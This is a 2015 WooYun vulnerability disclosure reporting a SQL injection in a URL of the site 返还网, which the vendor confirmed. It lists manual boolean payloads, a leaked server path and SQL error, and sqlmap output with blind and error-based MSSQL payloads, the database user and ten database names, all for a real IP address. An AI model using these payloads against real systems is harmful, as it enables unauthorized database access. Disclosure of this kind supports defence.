当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0125450
漏洞标题:
返还网某处伪静态SQL注射
相关厂商:
返还网
漏洞作者:
路人甲
提交时间:
2015-07-08 18:58
修复时间:
2015-08-23 09:08
公开时间:
2015-08-23 09:08
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
19
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

http://218.5.72.107:8080/*
payload:
' or 1=1 and 'a'='a
' or 1=2 and 'a'='a
引号直接报错:还爆出了系统路径:F:\项目\WP\03_src\LGFZ.Weiping.UI\Controllers\
Exception Details: System.Data.SqlClient.SqlException: 字符串 '' 后的引号不完整。
字符串 '
                         ) AS tbl
                 WHERE
                         row > 0 AND
                         row < 16' 后的引号不完整。
'
                         ) AS tbl
                 WHERE
                         row > 0 AND
                         ' 附近有语法错误。
SELECT ID,FatherID,UserID,UserName,ShopID,ProductId,UserIP,Content,Status,AddDate,replyTime,replyCount,Images,TargetUserID,TargetUserName,ForwardCount,CommentType
                 FROM    (
                           SELECT ROW_NUMBER() OVER(ORDER BY AddDate desc) AS row, *
                           FROM    ks_comment
                           WHERE   FatherID = 0 and UserName = '' or 1=2'
                         ) AS tbl
                 WHERE
                         row > 0 AND
                         row < 16
Source Error:

漏洞证明:

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://218.5.72.107:8080/-2235' OR 1648=1648 AND 'hFGi'='hFGi
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://218.5.72.107:8080/' AND 3433=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3433=3433) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND 'QOAu'='QOAu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'sa'
current user is DBA:    False
available databases [10]:
[*] Edm
[*] fanhuansqlbbs
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sendemail
[*] tempdb
[*] WeiPing

修复方案:

这个地方得好好过滤下,各种姿势都能注

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-07-09 09:06

厂商回复:

感谢提交,谢谢!

最新状态:

暂无